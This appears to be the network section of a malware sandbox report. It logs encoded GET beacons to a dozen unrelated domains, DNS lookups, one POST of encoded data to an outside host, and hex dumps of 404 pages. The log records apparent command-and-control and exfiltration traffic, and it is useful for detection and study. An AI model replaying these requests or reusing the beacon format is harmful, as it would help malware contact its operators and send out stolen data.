Source: global traffic	HTTP traffic detected: GET /a472/?fD=jmdR8js2K745w9duG20fYqFnwU+bCGk1cWKHz342ws1XHieKZe3C99dpKKnD83tJkcayHzCeZ9pypijZiF65Efqxzc0IleT34n8kjQ1m2nEIGr+ujgw0M5ErIDQmrZA0lA==&j0=vTcl_2X8QJ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Host: www.binpvae.lolConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Source: global traffic	HTTP traffic detected: GET /6tsi/?fD=32QAWULDWbDdguRmN+n7KAedzhLgUj/fuxT1ixo+bo/DV3lzYlgJ31gF+BLIDbJLYEln7zqyZcMgz5dBJXmOK4lY1iymAphF3EHD932tCXiTVvhf3y+Qx+z1RxDrWIu9Tw==&j0=vTcl_2X8QJ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Host: www.duzane.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Source: global traffic	HTTP traffic detected: GET /2c61/?fD=RJfS4vARZYm/oi22NSuVxsKXUXvAzLUuwV1pBI27iejWxHvYHo2LN7gu8qRYW6QqNtSAiHHGlyBTLaey7TeG8lKmZ3wdB0uWw8RQPkcPoCC9P3J1+WeEqjNfAM7KpTz+0w==&j0=vTcl_2X8QJ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Host: www.mg55aa.xyzConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Source: global traffic	HTTP traffic detected: GET /3osa/?fD=AxLVOe86WIqquROk4wW2qAARSAB2s4BJoZSnRO1SGEf+ewBgrgY/U4+QoHX9+oVsrlzSfgcLZGl64XyGJnoqgpfIm3dacYKZHld6caimAIQJPM6fBdCSw8qvz7rbMrI9Lg==&j0=vTcl_2X8QJ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Host: www.ie8mce.websiteConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Source: global traffic	HTTP traffic detected: GET /5965/?fD=9jQYDwKIZi6/W0GvqqOWctdn1nDe86qQU37QFI3e35aKJbsuGODGFib0m7CCxXxx0blg9Tj0Vv9f5L3iX8JxT+4MBVsytoUBFOmu7GzeNBgPNO5fqFAxhyq0WiRZHbK4BA==&j0=vTcl_2X8QJ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Host: www.shrongcen.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Source: global traffic	HTTP traffic detected: GET /gwqo/?fD=okHduu9bAgMM6c4GdEVgS1G+EVcXjBymZ/AEM3aFVKlZzziUwfhKvtqGWgkRboMd4eWK0/sAAMCd+0rGXOBNsjDOL2SA50vrXr2QK+Wy7YL6dLNwijbZiWqDBeKnevfe7g==&j0=vTcl_2X8QJ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Host: www.skyinftech.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Source: global traffic	HTTP traffic detected: GET /fv92/?fD=yI7uf9Jd8tsljExy4FTr0CscnPTbskSU+DRNkHPE+tdYilYSwjyHdOnSjMDaN65WqOB1l5kApI34wyc+ZLKDjlKfvq1mMUqSyQn9fVkF1OZZ/SY1Zq2D8T+x+vB090fBaA==&j0=vTcl_2X8QJ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Host: www.chowzen.topConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Source: global traffic	HTTP traffic detected: GET /xu8t/?fD=oLDpCnbN5EMtVvNuEYw6gh378b687bJxPTnAScZXHKxhJk1OMxSRGACd0IuiCNlkYArV6F8vzk4I0OqzhREuKfQnoPMdoexkT4JWajxv1pw2uo8FfxIIvkLkjjtF9ec8kQ==&j0=vTcl_2X8QJ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Host: www.lecoinsa.netConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Source: global traffic	HTTP traffic detected: GET /lx5p/?fD=syyr9ehUh5Dik7pm/3o58LEiuz6t5Qsxa3AqbpTiKXwTN4MFTP1/ruYiG066Pw0RpEGKYU+Xmw7DJuAgJs5fVEIr+ru5VK8zeO7ugFBDIhF/xAum4x9tUt/OQm4f5IJVQQ==&j0=vTcl_2X8QJ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Host: www.zhuan-tou.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Source: global traffic	HTTP traffic detected: GET /1134/?fD=JRkLtFSsjC7w4kQ+Hghs1xAb5q91nLV93kknhelN5q6byYvj/Lx1HFkRT0D1h5CmR4/eZjEjURe15+EWWNTABSUQK+lvVBorOgW9ps6acI3n3nS9RerGGmYjuLu9ItylLw==&j0=vTcl_2X8QJ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Host: www.kacotae.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Source: global traffic	HTTP traffic detected: GET /fhu0/?fD=w/3cKlYOZ7/u5gm7pV9f/KUaDpReXY6iTJBfq3uhFW9siwux7V61qX9CS7/86gr+3Jfc1RyXdSHIkUzafqUvuKZrochJkYXYnzSwKE48OKXAFHRmaq8ieG3R1w7I9MISvw==&j0=vTcl_2X8QJ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Host: www.webuyfontana.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0

Source: global traffic	DNS traffic detected: DNS query: www.am1-728585.com
Source: global traffic	DNS traffic detected: DNS query: www.witoharmuth.com
Source: global traffic	DNS traffic detected: DNS query: www.magnoliahairandco.com
Source: global traffic	DNS traffic detected: DNS query: www.binpvae.lol
Source: global traffic	DNS traffic detected: DNS query: www.duzane.com
Source: global traffic	DNS traffic detected: DNS query: www.mg55aa.xyz
Source: global traffic	DNS traffic detected: DNS query: www.ie8mce.website
Source: global traffic	DNS traffic detected: DNS query: www.shrongcen.com
Source: global traffic	DNS traffic detected: DNS query: www.skyinftech.com
Source: global traffic	DNS traffic detected: DNS query: www.chowzen.top
Source: global traffic	DNS traffic detected: DNS query: www.lecoinsa.net
Source: global traffic	DNS traffic detected: DNS query: www.zhuan-tou.com
Source: global traffic	DNS traffic detected: DNS query: www.kacotae.com
Source: global traffic	DNS traffic detected: DNS query: www.webuyfontana.com
Source: global traffic	DNS traffic detected: DNS query: www.lunareafurniture.com

Source: unknown

HTTP traffic detected: POST /jd4u/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.witoharmuth.comContent-Length: 203Cache-Control: no-cacheContent-Type: application/x-www-form-urlencodedConnection: closeOrigin: http://www.witoharmuth.comReferer: http://www.witoharmuth.com/jd4u/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0Data Raw: 66 44 3d 69 62 55 76 61 56 39 4f 66 68 52 48 76 38 70 46 7a 4e 68 69 45 36 6f 6a 2f 55 6b 39 54 74 52 55 6e 45 72 41 59 4a 41 51 6d 32 43 2f 6f 30 47 72 54 50 71 4c 65 52 75 32 46 38 46 32 57 45 38 6f 30 49 55 52 6c 6b 6c 39 39 5a 5a 36 37 5a 6d 70 32 46 70 6f 2f 6b 71 58 79 72 6e 6d 33 4b 72 56 37 32 52 39 6a 6d 76 64 37 64 4e 4b 59 30 54 52 58 62 4d 34 78 58 34 77 34 63 54 51 48 56 5a 48 42 2b 54 54 4a 51 7a 41 71 37 4c 59 72 4e 6e 35 45 5a 4e 41 45 56 53 74 33 6a 6b 64 7a 46 64 4a 42 6c 63 45 58 69 32 44 31 7a 49 70 4b 52 69 6a 4a 42 59 77 46 4a 37 6e 66 53 45 55 44 47 43 50 52 41 75 37 41 6b 73 3d Data Ascii: fD=ibUvaV9OfhRHv8pFzNhiE6oj/Uk9TtRUnErAYJAQm2C/o0GrTPqLeRu2F8F2WE8o0IURlkl99ZZ67Zmp2Fpo/kqXyrnm3KrV72R9jmvd7dNKY0TRXbM4xX4w4cTQHVZHB+TTJQzAq7LYrNn5EZNAEVSt3jkdzFdJBlcEXi2D1zIpKRijJBYwFJ7nfSEUDGCPRAu7Aks=

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jun 2024 09:03:40 GMTContent-Type: text/html; charset=utf-8Content-Length: 153Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Jun 2024 09:03:56 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.witoharmuth.de/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: User-AgentTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 53 65 69 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 26 23 38 32 31 31 3b 20 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 77 77 77 2e 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 20 26 72 61 71 75 6f 3b 20 4b 6f 6d 6d 65 6e 74 61 72 2d 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 Data Ascii: 2000<!DOCTYPE ht
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Jun 2024 09:03:59 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.witoharmuth.de/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: User-AgentTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 53 65 69 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 26 23 38 32 31 31 3b 20 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 77 77 77 2e 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 20 26 72 61 71 75 6f 3b 20 4b 6f 6d 6d 65 6e 74 61 72 2d 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 Data Ascii: 2000<!DOCTYPE ht
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Jun 2024 09:04:01 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.witoharmuth.de/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: User-AgentTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 53 65 69 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 26 23 38 32 31 31 3b 20 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 77 77 77 2e 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 20 26 72 61 71 75 6f 3b 20 4b 6f 6d 6d 65 6e 74 61 72 2d 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 Data Ascii: 2000<!DOCTYPE ht
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Jun 2024 09:04:04 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.witoharmuth.de/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: User-AgentTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 53 65 69 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 26 23 38 32 31 31 3b 20 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 77 77 77 2e 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 20 26 72 61 71 75 6f 3b 20 4b 6f 6d 6d 65 6e 74 61 72 2d 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 Data Ascii: 2000<!DOCTYPE ht
